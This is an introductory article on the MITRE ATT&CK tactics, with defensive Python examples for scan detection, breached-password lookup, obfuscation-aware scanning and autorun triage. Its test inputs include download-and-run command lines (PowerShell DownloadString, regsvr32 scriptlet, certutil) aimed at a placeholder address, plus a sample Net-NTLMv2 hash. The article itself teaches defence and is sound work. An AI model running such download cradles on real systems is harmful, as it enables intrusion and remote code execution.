MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) Framework
There are a thousand things you can do with the MITRE ATT&CK Framework. However, since this is an introduction, we will just talk about the easy things. The first thing you need to be introduced to is the concept of TTPs, which stands for Tactics, Techniques, and Procedures. TTP is a common military term, defined in Joint Publication 1-02. Basically, it is like a funnel. Tactics are the broad considerations on what should be done, like the general who wants to take the next hill. Techniques are more specific on how to achieve the goal, such as using climbing skills to scale a cliff to get to the top of the hill. Procedures are how to tie the knots in the rope used to scale the cliff to take the hill. ATT&CK uses the words the same way: a tactic is the adversary's goal, a technique is a way of achieving it, and a procedure is the specific way a particular group has been observed doing it.
In the MITRE ATT&CK Framework (the Enterprise matrix), there are 14 tactics. These are the broad steps which need to be taken to effect a cyber-breach. Not all of them are done every time, nor in the exact same order, but most of them are done most of the time. What we will do is go over each of the tactics, what they mean, and how they can affect your company or your employees. As the saying goes (it is usually credited to Francis Bacon), "knowledge is power."
When we get to an advanced level, we can use the combination of techniques to identify specific threat actors. What has been found is that when a group of hackers finds something that works, they usually stick to it. That means when we see a group of techniques put together during a breach, it is likely the same group that used those techniques together last time. That said, one group can try to mimic the behavior of another group to get them blamed for the hack (a false flag). However, that is spy-vs-spy stuff, and your normal criminal hackers just want your money and don't care as much whether you know who they are.
Below are the 14 tactics described by the MITRE ATT&CK Framework. We will go through each one of them individually in a separate article linked below.
Reconnaissance is the first of the 14 tactics used by hackers to attack your system. While not all tactics are used every time, a systematic review of each of these tactics in order will help you understand how to better defend your network.
Reconnaissance is kind of like the bear who went over the mountain. For most of this phase your company will have no indication that it is being targeted. Hackers during this phase will try to collect information on your company, usually without actually touching any of your resources. They may try to figure out who is hosting your website, which email service you use, and what email accounts are visible in the public record. Social media sites like LinkedIn are also scanned during this phase to see who works for the company. Potential email addresses are formulated based on the patterns observed on the internet. If Karen Smith's address is seen to be firstname.lastname@example.org and Judith Jones is found to also work there, the attacker can guess that Judith's address follows the same firstname.lastname pattern at the same domain.
As the last phase of reconnaissance, attackers will start their active scans. If they do this well, you will never notice you are being scanned. Think of it as two grocery stores selling the same candy at the checkout aisle. Each wants to find out what price the other is selling the candy for. Store A sends an employee in to stand in the checkout aisle and spend 10 minutes writing down the name of each candy being sold and the price it is being sold for. When they do this, it is obvious what they are doing, it causes disruption, and they get caught and banned from the store. Store B sends 20 employees over a week to each discover the name and price of one type of candy sold at the checkout line. They are never discovered, and their intelligence helps them undercut their competitor.
The same goes for scanning your firewall. If the scan is done from multiple source addresses over a long period of time, you will probably never know you are being scanned, because no single source ever trips the per-source thresholds most firewalls and intrusion detection systems use. This is sometimes referred to as "low and slow". If it is done very rapidly from one location, you can easily identify that you are being scanned and block the source before the scan is complete. Catching the slow version means keying your detection on the target rather than the source: how many distinct ports and sources have probed this host over the past week, not over the past minute.
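To make the "low and slow" point concrete, here is an added example (not code from the original article) that runs two detection rules over constructed firewall deny logs: the usual per-source burst rule, and a per-target rule that counts distinct probes against one host over a week regardless of who sent them. The log lines, addresses, and thresholds are all made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall denies (not from any real device): one noisy scanner that
# probes 40 ports in 40 seconds, and 20 "low and slow" sources that each probe a
# single port, eight hours apart, over almost a week.
def make_sample_log():
    t0 = datetime(2024, 3, 1, 2, 0, 0)
    lines = []
    for i in range(40):  # the Store A employee: fast, from one address
        ts = (t0 + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} 198.51.100.7 -> 203.0.113.10:{1000 + i} DENY")
    for i in range(20):  # the Store B crew: one port each, spread out in time
        ts = (t0 + timedelta(hours=8 * i)).isoformat()
        lines.append(f"{ts} 198.51.100.{50 + i} -> 203.0.113.10:{2000 + i} DENY")
    lines.append(f"{t0.isoformat()} 198.51.100.200 -> 203.0.113.10:443 ALLOW")  # normal visitor
    return sorted(lines)

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (ALLOW|DENY)$")

def parse(lines):
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts, src, dst, port, action = m.groups()
            events.append((datetime.fromisoformat(ts), src, dst, int(port), action))
    return events

def per_source_burst(events, window=timedelta(seconds=60), threshold=20):
    """The rule most firewalls ship with: one source hitting >= threshold distinct
    ports within the window. It catches the fast scanner and nothing else."""
    by_src = defaultdict(list)
    for ts, src, _dst, port, action in events:
        if action == "DENY":
            by_src[src].append((ts, port))
    flagged = set()
    for src, hits in by_src.items():
        hits.sort()
        for i, (start, _p) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - start <= window}
            if len(ports) >= threshold:
                flagged.add(src)
                break
    return flagged

def per_target_slow(events, window=timedelta(days=7), threshold=15, min_sources=5):
    """Key on the destination instead: many distinct (source, port) probes against
    one host over a long window, from several sources, is a distributed scan even
    though no single source ever trips the burst rule."""
    by_dst = defaultdict(list)
    for ts, src, dst, port, action in events:
        if action == "DENY":
            by_dst[dst].append((ts, src, port))
    flagged = {}
    for dst, hits in by_dst.items():
        hits.sort()
        for i, (start, _s, _p) in enumerate(hits):
            probes = {(s, p) for t, s, p in hits[i:] if t - start <= window}
            sources = {s for s, _ in probes}
            if len(probes) >= threshold and len(sources) >= min_sources:
                flagged[dst] = sorted(sources)
                break
    return flagged

if __name__ == "__main__":
    events = parse(make_sample_log())
    print("burst rule flags:", per_source_burst(events))
    print("per-target rule flags:", per_target_slow(events))
```

The burst rule flags only 198.51.100.7; the 20 slow sources each touch one port and never exceed any per-source threshold. Only the per-target view, which does not care who sent the probe, reveals that 203.0.113.10 was fully enumerated.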
It is also possible to be contacted by the hackers during this phase. In this case it is not for the purpose of stealing credentials, but solely to find out about the company. The hacker may pose as a job seeker and ask about the company, who the CEO is, where they are located, are there any satellite offices, and what the website is. These are all normal questions and answers are usually freely given. However, this helps the hackers build the profile of the company. They could then call back another employee, drop a name and ask for the number and name of helpdesk employees. This is all a form of social engineering, but still no credentials have been stolen yet, this is just building the dossier of information which will make the next phases easier to complete. Remember, it is perfectly fair game for a hacker to physically approach your company, socially engineer their way into the server room, and then steal everything you have without ever having breached the firewall. Social Engineering was Kevin Mitnick’s self-claimed best skill as portrayed in his book The Art of Deception and the movie Takedown released in 2000.
Resource development is the second of 14 tactics in the MITRE ATT&CK Framework.
This is where the hackers develop the tools, accounts, and platforms they will eventually attack your network with. If they are going to scan your network, they will need servers around the country, or around the world, to hide their efforts. This is where they may rent virtual machines at different hosting providers which will take turns scanning your network. Unfortunately, there is not much you can do during this phase of preparation by the hackers. This phase is also where they may passively collect usernames and passwords for your employees. The dark web is full of password breaches, and people often reuse passwords or portions of passwords. If one of your employees was a victim of a former breach, their current password for your network may already be exposed.
If you are curious or concerned about whether or not your employees' credentials have been leaked, there are a few services which can help you figure this out. One is https://haveibeenpwned.com/, which is run by Troy Hunt. This site will allow you to enter an email address and see if it has appeared in any known credential dumps. Troy has decoupled the passwords from the email addresses, so this search will not turn up any passwords associated with those accounts. Troy also has another page on his website to look up passwords to see if they have been compromised, https://haveibeenpwned.com/Passwords. That lookup is designed so the password itself never leaves your machine: only the first five hex characters of its SHA-1 hash are sent, the service returns every known hash that starts with those characters, and the comparison is done on your side.
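As an added example of how the Pwned Passwords lookup avoids sending the password itself, the block below (written for this article, not taken from haveibeenpwned.com) does the k-anonymity split in Python. The live request goes to the real range endpoint, but the offline stand-in response is constructed: the suffix for "password" is real because it is computed from SHA-1, while the neighbouring suffixes and the counts are made up.

```python
import hashlib
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"

def split_sha1(password: str):
    """k-anonymity split: only the 5-hex-char prefix ever leaves the machine."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

def count_in_range(suffix: str, body: str) -> int:
    """The range endpoint answers with 'SUFFIX:COUNT' lines for every known hash
    sharing the prefix; we find ours locally, so the server never learns which one."""
    for line in body.splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.upper() == suffix:
            return int(count or 0)
    return 0

def pwned_count(password: str, fetch_range) -> int:
    prefix, suffix = split_sha1(password)
    return count_in_range(suffix, fetch_range(prefix))

def fetch_range_http(prefix: str) -> str:
    """Live lookup (not used by the offline demo). Add-Padding makes every response
    a similar size so an observer on the wire learns nothing from its length."""
    req = urllib.request.Request(RANGE_URL + prefix,
                                 headers={"Add-Padding": "true", "User-Agent": "example-checker"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")

# Constructed stand-in for the HTTP response for prefix 5BAA6 (SHA-1 of "password"
# begins 5BAA61E4...). The other suffixes and all the counts are made up.
OFFLINE_RANGES = {
    "5BAA6": "\r\n".join([
        "00A5D1C3E7F9B2D4A6C8E0F1A3B5C7D9E1F:2",
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493",
        "FFE2B4D6A8C0E1F3A5B7C9D1E3F5A7B9C1D:0",   # padding entries carry a count of 0
    ]),
}

def fetch_range_offline(prefix: str) -> str:
    return OFFLINE_RANGES.get(prefix, "")

if __name__ == "__main__":
    print("'password' seen", pwned_count("password", fetch_range_offline), "times")
```

Swap fetch_range_offline for fetch_range_http to query the real service; the password still stays local, because only the prefix is ever put on the wire.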
Initial Access is the third tactic listed on the MITRE ATT&CK Framework. As mentioned before, these do not all need to happen in order; however, initial access does need to be up front, as most of the tactics which follow on the matrix require initial access to first be achieved.
A hack is not a breach unless someone enters the system. Initial access is the first time a hacker enters your network. This can be done in a number of ways, but once it is done, the real danger has started. During the previous phases, valid credentials which had been compromised were likely collected. Hackers can sometimes just log in with these credentials. Oftentimes, this type of access cannot be differentiated from a valid login. Not always, though. One way to check for suspicious logins is GeoIP. GeoIP is a method which estimates where in the world someone is logging in from, based on their IP address. If 100% of your users are in Pennsylvania and someone logs in from Asia with valid credentials, then you have good reason to be suspicious. (Corporate VPNs and cloud proxies make this noisier than it sounds, so establish what normal looks like for each user before you alert on it.)
Another way into your network is the age-old phishing scheme. Of course, phishing is when someone receives an email purporting to be from someone else, like Microsoft, eBay, or even your own helpdesk. The main goal of phishing is to steal someone's credentials so that, again, the hacker can log in in a way which looks valid to everyone who is looking. This is why employee education is so important. You can have $100,000 worth of firewalls and endpoint detection software and an unwitting employee can still compromise your network.
Don't forget about physical security too. If a hacker can get into your building and plant a device on your network, then they really don't need any unwitting employees to compromise the network. While port security on your switches (limiting which devices may use a given port) will often work, disabling unused switch ports is sometimes necessary to lock out rogue devices. This is not to dismiss actually hacking things like public-facing web apps or databases. Any port open on your firewall is a potential vulnerability, and any vulnerability has the potential to be exploited by threat actors. Remember, your best chance to protect your network is to not allow initial access. Once they are inside your network, it becomes a lot harder to detect malicious activity and distinguish it from the hundreds or thousands of regular users on the network.
Execution is the fourth tactic on the MITRE ATT&CK Framework and usually directly follows Initial Access. If you somehow get access without execution, it will be hard to further the progression of the intrusion. So this tactic will almost always happen early in the breach of your network.
Once someone is logged in, the next thing they need to do is run programs on your system. This may seem obvious, but not every method of entry onto the network will allow program execution. Imagine an unsecured CCTV camera or an unsecured printer. These devices may not allow program execution but may allow lateral movement. This is a good segue to the fact that the tactics on the MITRE ATT&CK framework may not go in a linear fashion. Execution is the fourth tactic on the framework chart, but Lateral Movement is the tenth. However, when the network intruder finds themselves on a device where they cannot execute programs, they have no choice but to move laterally, which is sometimes called "island hopping." But back to execution: there are many types of entry onto a network which do not provide a traditional login environment, and the hacker needs to be creative about how they will execute programs on the devices they compromise. The hacker's main goal at this stage is what they term "popping a shell." What this means is they want to somehow open the command line interpreter on your computer or server. This is the interface on your computer where you can run programs just by typing the name of the program and hitting the enter key. Once this is achieved, they can usually run programs which help them further own your machine.
Persistence is the fifth tactic listed on the MITRE ATT&CK Framework. It may not always be the fifth event to happen and in certain circumstances, it may not happen at all. However, most hackers will want to maintain access to a box they successfully penetrated.
Breaking into a computer is all fun and games right up until someone reboots that computer.
Oftentimes, if the hack is not complete, a reboot will kick the hacker right off of the machine. In order to prevent being kicked off during a reboot, the hacker must establish persistence on your machine. In Microsoft Windows there are many normal ways for a program to autorun at bootup or when the user logs in: the Run and RunOnce registry keys, the Startup folder, scheduled tasks, and services, to name a few. You normally see this when you first log on and all of the icons start popping up in the bottom right hand side of your screen. These are usually programs that your IT group has established as necessary to operate your computer, like your antivirus program and the battery icon for your laptop. Hackers can place their malware in the exact same locations and not even have an icon show up at the bottom of the screen. Since this is something that even regular users can do (the per-user Run key and Startup folder need no special rights), the hacker does not need to be an administrator yet on your machine to use some of these techniques. If they can also promote themselves to an administrator, even more options open up on how to hide a persistence mechanism. Most mechanisms of persistence are housed somewhere in the operating system. This means that your IT department can often rescue your computer with a fresh install of the operating system over a wiped disk. However, sometimes the persistence mechanism is stored in the hardware of your computer. More specifically, the malware can be stored in the firmware of the computer which runs before the operating system (like Microsoft Windows) loads. If the malware makes its way into the firmware, the only options left are to reflash the firmware from a known-good image or replace the computer. This is a good reminder that poor cybersecurity costs money. Money not just in time, but potentially money in hardware too.
Privilege Escalation is the sixth of 14 tactics on the MITRE ATT&CK Framework. While some hacking and exfiltration tasks can be accomplished at the user level, the goal of most hackers is to gain administrative access to your computer.
The first level of elevation for a hacker is when they "pop a shell" on your computer. To "pop a shell" means to open a command line interface on your computer from which they can then run programs remotely. However, some exploits only give the hacker user-level access to your computer or server. The true fist-pumping event is "getting root" on your machine. To "get root" means that the hacker has found a way to elevate their level of access to that of the administrator of the system. It is called "root" because that is the name of the administrator account on Linux and Unix operating systems. Most hackers use some version of the Linux operating system to conduct their attacks, so it makes sense that they would use Linux terminology to describe their progress. Once the intruder successfully elevates privileges they can do many more things, like disable and delete the internal mechanism that Microsoft Windows has for local backups (Volume Shadow Copies). This level of access is also necessary for ransomware to work effectively. Remember, ransomware not only encrypts your files, it encrypts everyone's files on the shared drives and servers, and that kind of reach usually requires administrative, or root-level, access. Unfortunately, once an attacker gains a foothold in your network, administrative access is usually not far behind. This means that stopping initial access is your best bet to stop a hacker from totally owning your network.
Most people and companies have some type of protection set up on the computers they manage. Even Windows now comes pre-installed with Microsoft Defender, which is both an antivirus and an anti-malware product. So with these products installed on nearly every computer, hackers need to find a way around these defensive measures. Defense Evasion is the seventh of the 14 tactics on the MITRE ATT&CK Framework. It may not always be the seventh thing to happen during a breach, but it almost always needs to happen.
If you look at the MITRE ATT&CK Framework you will see around 40 different techniques listed under the Defense Evasion tactic. One of the easiest ways to evade defenses is through the use of valid administrator credentials. Remember, administrators can usually turn off antivirus programs, which is the ultimate way to get around defenses. I am going to state something that seems obvious, but it will make sense in a minute. An antivirus program can protect a computer as soon as it starts running, but not before it starts running. In order to be most effective, antivirus programs usually start early in the boot process. However, if malware can start running before the antivirus program starts, the malware can easily evade the antivirus program and even intercept the calls the antivirus makes to the operating system. (This is exactly the gap that Secure Boot and Windows' Early Launch Anti-Malware drivers exist to close.)
Another way to evade defenses is through obfuscation. The way most simple antivirus programs work is through signature analysis. This means that a string of bytes which is unique to each virus is stored in the antivirus program's definitions, and each new program which is loaded onto the computer is scanned for a matching string of bytes. Now if the hacker compresses, encodes, or encrypts the malware, this unique string of bytes disappears, and a scanner that only looks for signatures fails to identify the malware. This is why modern engines also unpack common encodings and run suspicious files in an emulator before scanning: the malware has to decode itself in order to run, and the original string reappears at that moment.
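The following is an added example (not from the original article) showing exactly why encoding beats a signature-only scanner, and what a slightly smarter scanner does about it. The "malware" is a harmless constructed string with a made-up marker; the signature and the detection name are assumptions for the demonstration.

```python
import base64
import binascii

# Constructed stand-in for a malicious script body and the definition an
# old-style signature scanner would carry for it. Neither is real malware.
PAYLOAD = (b"powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
           b".DownloadString('http://203.0.113.5/s')\" # CONSTRUCTED_MARKER_9f3a")
SIGNATURES = {"Constructed.Downloader": b"CONSTRUCTED_MARKER_9f3a"}

def signature_scan(blob: bytes, signatures=SIGNATURES):
    """Plain substring match, the way a definition-only scanner works."""
    return [name for name, sig in signatures.items() if sig in blob]

def xor_obfuscate(data: bytes, key: int) -> bytes:
    """The 'encode it so the string disappears' trick from the text (1-byte XOR)."""
    return bytes(b ^ key for b in data)

def base64_obfuscate(data: bytes) -> bytes:
    return base64.b64encode(data)

def deep_scan(blob: bytes, signatures=SIGNATURES, max_depth=1):
    """What a better engine does: peel plausible encoding layers and rescan.
    Real products also emulate execution; this only handles base64 and 1-byte XOR,
    one layer deep by default (raise max_depth for stacked encodings)."""
    found = set(signature_scan(blob, signatures))
    if max_depth == 0:
        return sorted(found)
    layers = []
    try:
        layers.append(base64.b64decode(blob, validate=True))
    except (binascii.Error, ValueError):
        pass  # not valid base64, skip that layer
    layers.extend(xor_obfuscate(blob, k) for k in range(1, 256))
    for layer in layers:
        found.update(deep_scan(layer, signatures, max_depth - 1))
    return sorted(found)

if __name__ == "__main__":
    for label, sample in [("plain", PAYLOAD),
                          ("base64", base64_obfuscate(PAYLOAD)),
                          ("xor 0x5A", xor_obfuscate(PAYLOAD, 0x5A))]:
        print(f"{label:9} signature-only={signature_scan(sample)}  deep={deep_scan(sample)}")
```

The signature-only scan finds the marker in the plain payload and nothing in either encoded copy; the layered scan recovers it from both, because the attacker's decoder is trivially reversible. Stacking encodings or using a real cipher defeats this too, which is why behaviour-based detection at execution time matters more than the scan on disk.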
Two last techniques we will go over in this overview are Signed Binary Proxy Execution and Signed Script Proxy Execution (ATT&CK has since renamed them System Binary Proxy Execution, T1218, and System Script Proxy Execution, T1216). These are essentially the same idea. One way that Microsoft confirms that a program is genuine is through digital certificates. Generally, if a program is digitally signed by Microsoft, then Windows, and the security tools and application allow-lists running on it, trust the program and let it run. This makes sense as only someone with Microsoft's private key can sign a program or script as Microsoft. Public/private key cryptography is a discussion for another day. Until then, think of the private key as a signet ring used in Medieval through Victorian days to seal a letter with wax to authenticate the author of the letter. So back to that Microsoft-signed program. In this case, Windows sees the Microsoft signature, validates it as genuine, and allows the program to run unhindered. The trick is that some of these programs can be used to spawn other programs or load other code: rundll32.exe will load any DLL you name, regsvr32.exe will fetch a scriptlet from a URL, and mshta.exe will run an HTML application. This is like using the shortstop to relay a throw to home plate from the left fielder. In this case, the shortstop changes out the baseball for something malicious, which then continues through the process as if the left fielder had thrown the original ball. We may use that analogy again and change up what the shortstop does to the traffic, but that is for another article. We have only covered a few scenarios of defense evasion, but there are many more ways to get around cyber defenses than listed here. A more complete list can be found at https://attack.mitre.org.
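As an added example serving both the persistence discussion above (what autoruns from a user-writable folder) and the proxy-execution techniques just described, the block below triages constructed Run-key values and process command lines. The binary list and argument patterns are my own choices, the paths and events are made up, and it is not code from MITRE or from the original article; on a real host the input would come from a registry export or a process-creation log rather than a dictionary.

```python
import re

# Signed Windows binaries commonly abused as proxies (examples under ATT&CK T1218/T1216).
PROXY_BINARIES = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe",
                  "msiexec.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
SUSPICIOUS_ARGS = [
    (re.compile(r"https?://", re.I), "remote URL in arguments"),
    (re.compile(r"\b(javascript|vbscript):", re.I), "inline script"),
    (re.compile(r"/i:\S+|scrobj\.dll", re.I), "regsvr32 scriptlet load"),
    (re.compile(r"-urlcache|-decode", re.I), "certutil download/decode"),
    (re.compile(r"-(e|enc|encodedcommand)\b", re.I), "encoded PowerShell"),
]
# Folders a non-admin user can write to; a legitimate autorun rarely lives there.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public|ProgramData)\\", re.I)

def split_command(cmd: str):
    """First token is the image; handle the quoted 'C:\\Program Files\\...' case."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end], cmd[end + 1:].strip()
    image, _, args = cmd.partition(" ")
    return image, args

def triage(cmd: str):
    """Return the reasons (possibly none) this command line deserves a look."""
    image, args = split_command(cmd)
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    reasons = []
    if USER_WRITABLE.search(image):
        reasons.append(f"image runs from a user-writable path: {image}")
    if exe in PROXY_BINARIES:
        for pattern, why in SUSPICIOUS_ARGS:
            if pattern.search(args):
                reasons.append(f"signed proxy {exe}: {why}")
        if USER_WRITABLE.search(args):
            reasons.append(f"signed proxy {exe}: loads from a user-writable path")
    return reasons

# Constructed inputs: Run-key values as they would appear in a registry export,
# plus process-creation command lines. None come from a real incident.
AUTORUN_VALUES = {
    "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    "Updater": r'"C:\Users\ksmith\AppData\Roaming\svc\update.exe" -q',
    "Helper": r"rundll32.exe C:\Users\ksmith\AppData\Local\Temp\h.dll,Start",
}
PROCESS_EVENTS = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"regsvr32.exe /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll",
    r"certutil.exe -urlcache -split -f http://203.0.113.5/a.exe C:\Users\Public\a.exe",
    'mshta.exe vbscript:Execute("MsgBox 1")',
]

def triage_all(commands):
    return {cmd: triage(cmd) for cmd in commands}

if __name__ == "__main__":
    for cmd, reasons in triage_all(list(AUTORUN_VALUES.values()) + PROCESS_EVENTS).items():
        print(("SUSPECT " if reasons else "ok      ") + cmd)
        for r in reasons:
            print("          -", r)
```

The two vendor autoruns pass, the one living under AppData is flagged on path alone, and the rundll32 entry is flagged because a signed Microsoft binary is being used to load a DLL from Temp. The process events show the same logic catching the classic regsvr32 scriptlet and certutil download patterns while leaving svchost alone.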
Credential Access is the eighth tactic on the MITRE ATT&CK Framework. As mentioned before, this does not mean it is always the eighth event to happen during an attack. However, it is never the first. To access credentials on the network, you must first have some type of access to the network.
Operating systems store your password. There is no way around it. When you want to log into your computer, you need to present some kind of credential, and the most common thing today is something you know, which turns out to be your password. However, most operating systems today do not store your password in clear text. For example, Microsoft Windows stores your password as a cryptographic hash known as Message Digest 4 (MD4); this is the "NT hash". For you techno-nerds, it is really the MD4 of the password encoded as 16-bit little-endian Unicode (UTF-16LE); for an ASCII password this just interleaves a zero byte after each character, so it does not make the hash any stronger. There is no salt, either, so two users with the same password have the same hash. For the uber-nerds, starting in Windows 10 version 1607, Microsoft encrypts that MD4 hash with AES inside the SAM database. This is like putting a coded message in a lockbox. However, Microsoft stores the key to that lockbox in the SYSTEM registry hive, so for an attacker who already has administrator access that is next to useless (for the cyber-savants, go here: http://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/). Okay, back to MD4 hashes and your password. So let's say that your password is "hashcat"; then the MD4 hash of your password is:
Once a hacker has administrator access to a machine, there are many different ways this hash can be extracted, for both local users and (from a domain controller) domain users. Now, MD4 is an extremely old and fast hashing algorithm. What this means in real life is that using a relatively old gaming graphics card, you can achieve well over one billion password guesses per second once you have this hash. If we go back to our password math article here, we can see that if we use only numbers, we can crack a nine character password in under a second (10^9 = 1 billion). If we use only lower case letters, we can crack a seven character password in eight seconds (26^7 ≈ 8 billion). If we use uppercase and lowercase letters, we can crack a six character password in about 20 seconds (52^6 ≈ 19.8 billion). There is another way a hacker can get something derived from your password. While Windows stores the password on disk as an MD4 hash, when you authenticate to another machine over the network it does not send that hash; it sends a challenge-response value computed with HMAC-MD5, keyed by the hash. That construction is also old and can be cracked pretty fast on modern gaming graphics cards, although each guess costs more than a raw MD4 hash does. An example of what is called Net-NTLMv2 (here in the format hashcat accepts) is
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
This may look complicated, but this also resolves to "hashcat" pretty easily. The fields, separated by colons, are the username, an empty field, the domain, the server's challenge, the 32-hex-character response (the fourth field, starting 88dcbe44), and the blob of timestamp, client challenge, and target information that the client mixed into it. Only that 32-character response is the HMAC-MD5 output; the challenge and blob act like salts. They stop the hacker from precomputing a table of responses ahead of time, but they are right there in the capture, so they don't add much to the time it takes to brute force the password: each guess is just two HMAC-MD5 computations. If you are further interested in the math behind this, you cyber-savants can go here: https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 (the response is really HMAC-MD5 keyed with the NT hash rather than a plain MD5 hash, but the cracking math is the same).
The last one we will talk about here is plain old unsecured credentials. Sometimes administrators like to use the command line to run certain programs. They do this because they can string certain commands together in what is called a script or a batch file. While it is bad practice to do so, some of these commands take a username and password as arguments, especially if you need to log in to a database or elevate your privileges. The bad thing is that most shells keep a history of the commands that were run (for example .bash_history on Linux, or PowerShell's PSReadLine history file on Windows), and now this clear-text history file contains usernames and passwords including, possibly, one to become the administrator of the computer or network.
Discovery is the ninth tactic listed on the MITRE ATT&CK Framework. This tactic will just about always happen because it describes the enumeration of your internal network. The vulnerable path which led to the breach of your network may not be the most interesting computer on your network. Here is where the hackers find out which computer that may be.
So your network has been breached and the hacker is sitting on the first computer inside your network since the attack began. Imagine if you will someone sitting on a wall surrounding a city overlooking everything that is happening within that bustling metropolis. That is what the hacker will want to do once they have a foothold on the first machine. The first type of discovery can still be within that one computer by looking for files with important information in them like personally identifiable information (PII), personal health information (PHI), or banking/financial information. This can include browser history, bookmarks, and any running programs. At this point your keyboard is also susceptible to being captured so there goes your banking password (but this is a later tactic called Collection). However, it doesn’t stop there. Since this computer is connected to most, if not all, of the rest of the network, the hacker needs to see what is out there. This is like slowing down and looking at the traffic on the highway before you merge onto the interstate. The first thing they are likely to do is to do what is called a ping sweep. This is like playing Marco Polo in the swimming pool or more aptly, like a submarine sending out active sonar (remember Sean Connery in The Hunt for Red October “One ping only please” https://www.youtube.com/watch?v=jr0JaXfKj68). This can be done with tools built into Microsoft Windows.
Once the hacker finds other computers on the network they need to see what ports are open on those computers. Ports are like doors which allow programs running on a computer to talk to other computers. What is special about open ports on a computer is that they allow outside computers to initiate conversations, which is usually not allowed. If you commonly use network file shares or mapped drives to store files on another server, you are using open ports on the server holding the files. That server is running a program which is listening and waiting for you to connect to it. The problem is that there are many ways on the network for the hacker to impersonate you to get to those files. As I have mentioned before, the best way to protect your network is to not let the hackers in to begin with. This responsibility lies with each and every employee in the company, not just the IT staff. Neither the staff accountant nor the CEO should think "Oh, it is okay to click on this link because the IT staff should be able to prevent any hacker from getting into our network." Having confidence in your IT staff does not excuse carelessness. Script kiddies, hacktivists, organized crime, and nation-states are all after your money and intellectual property. It is up to you to keep them out of your network, no matter your job title or job description.
Lateral Movement is the tenth of 14 tactics on the MITRE ATT&CK Framework. As stated before, this does not mean it is the tenth step that hackers take, but logically, this is later in the process. Lateral movement means jumping off of the initially hacked box and moving around the network. In order to do this, you have to have already hacked that first box.
Lateral movement is related to a technique called island hopping. They both involve moving around networks, but island hopping is where you compromise a smaller, less useful resource in order to get access to a larger, more attractive target network. This can be where you compromise a printer to get access to the file server. Most people don’t care whether or not you have access to a printer, what are you going to do, change the toner? However, a lot of the office printers today have a feature called scan-to-email or scan-to-fileserver. That means that the printer has some type of access to both the email server and fileserver. Island hopping can also refer to using an outside vendor to gain access to your network; one which has access to your network like the HVAC vendor did for the Target breach in 2013 (https://krebsonsecurity.com/2014/02/target-hackers-broke-in-via-hvac-company/).
Remember, the hacker is inside your computer at this point. They are not only sitting on the internal network looking for places to go, they also likely have full access to your email account. With this access they can send out emails to others while pretending to be you. This can have severe consequences depending on whose computer has been hacked. If you are the summer intern, there is not much the hacker can do with your email except send out other emails with malicious attachments in them. This is called internal spearphishing. Maybe they can ask someone for a spreadsheet of everyone in the company with their phone numbers. Maybe they can ask for the names of someone on the IT helpdesk. If you think creatively, email from this level of employee can still be dangerous, because even the summer intern is a trusted insider. Now switch to the scenario where the CFO or CEO gets hacked. The bank now starts getting emails to wire money overseas and fulfills the requests because the email is coming from someone with authority to make those requests. Basically, once inside, the hackers can set up base camp on your computer and forage out from there through the entire network. This is why ongoing cybersecurity is so important and is so much more than just the annual phishing training.
The Collection tactic is the eleventh tactic in the MITRE ATT&CK Framework. As stated before, this does not mean it is the eleventh thing to happen during an attack, it just means that a few things have to happen before the hacker can start gathering data. This includes the initial compromise and then navigating to where the important data is.
The idea that most people have is that hackers break into their computer and steal stuff. That is true, but they can’t just steal everything. They have to be selective on what they take. If they try to take a bit-for-bit image of your hard drive, not only would that take a very long time, it would likely be noticed by an alert cybersecurity program. Instead, the cyber criminals will often be very particular on what they eventually steal. I say eventually because they have to gather what they want before they ship it off home. You can think of it as the traditional burglar with a black sack which is being filled with money and jewels from the safe of an old mansion. You can also think of it as moving day where you fill boxes with your important papers so you can more easily carry them to your new house instead of carrying them folder by folder. In any event, collection is the capture and packaging of data important to the hackers. This can be audio data of a board meeting captured through your microphone. This can be webcam data captured from the laptop in the conference room. This can be keystrokes from your keyboard when you log into your online banking website. This can be a dump of client information from your retail database. Anything the computer interacts with can be captured.
Some networks have data loss prevention (DLP) programs running which inspect packets leaving the network to look for sensitive data. This is great if the data going out is unencrypted. However, what happens if the hackers put all of the data they collected into an encrypted RAR or ZIP file? How will the DLP program be able to inspect that encrypted file? The answer is, it cannot read the contents. What it can still do is prevent files over a certain size from being exfiltrated off of the computer, stop all transfers when a certain upload data limit has been reached, and recognize the container itself: an encrypted ZIP or RAR announces itself in its headers (the archive format marks each encrypted entry with a flag), and encrypted data looks like random noise. Other than that, if the hackers have locked their black bags full of your data, it will be hard to stop them from getting that data off of your network. If encrypted files are rare in your computing environment, setting up a scan for large encrypted archives or large high-entropy files might identify a clandestine collection event happening right now. Otherwise, if the hackers have gotten to this stage in the process without being detected, then the chances are low that you will stop them now with the tools you have in place.
